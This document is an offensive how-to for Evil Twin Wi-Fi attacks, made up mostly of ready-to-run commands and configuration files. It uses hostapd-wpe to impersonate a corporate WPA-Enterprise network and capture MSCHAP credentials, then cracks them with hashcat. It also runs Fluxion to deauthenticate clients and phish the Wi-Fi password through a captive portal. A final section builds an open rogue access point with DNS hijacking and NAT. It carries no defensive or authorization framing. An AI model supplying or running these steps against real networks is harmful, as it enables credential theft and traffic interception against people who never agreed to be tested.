Evil Twin Attack

An Evil Twin is a rogue access point that mimics a legitimate network. When clients connect, attackers can capture credentials or intercept traffic.

Using hostapd-wpe for WPA-Enterprise

Install hostapd-wpe.

git clone https://github.com/OpenSecurityResearch/hostapd-wpe
cd hostapd-wpe
./install.sh

Configure hostapd-wpe.conf.

interface=wlan0
ssid=CorpWiFi
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key

Run the attack. Captured credentials will appear in the output.

sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

MSCHAP challenge/response can be cracked. Convert to hashcat format (username::::response:challenge) and crack with mode 5500.

hashcat -m 5500 captured.hash /usr/share/wordlists/rockyou.txt

Using Fluxion (Automated WPA-PSK)

Fluxion automates the evil twin process for WPA-PSK networks.

git clone https://github.com/FluxionNetwork/fluxion
cd fluxion
sudo ./fluxion.sh

Fluxion workflow:

1. Scan for targets
2. Capture handshake
3. Create evil twin
4. Deauth clients from real AP
5. Clients connect to evil twin
6. Serve captive portal asking for WiFi password
7. Validate password against handshake

Manual Evil Twin with hostapd + dnsmasq

Configure hostapd.conf for an open network.

interface=wlan1
driver=nl80211
ssid=FreeWiFi
hw_mode=g
channel=6
wmm_enabled=0
macaddr_acl=0
auth_algs=1
wpa=0

Start the fake AP.

sudo hostapd hostapd.conf

Configure DHCP with dnsmasq.

interface=wlan1
dhcp-range=192.168.1.100,192.168.1.200,12h
address=/#/192.168.1.1

Enable IP forwarding and NAT for internet access (optional).

sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE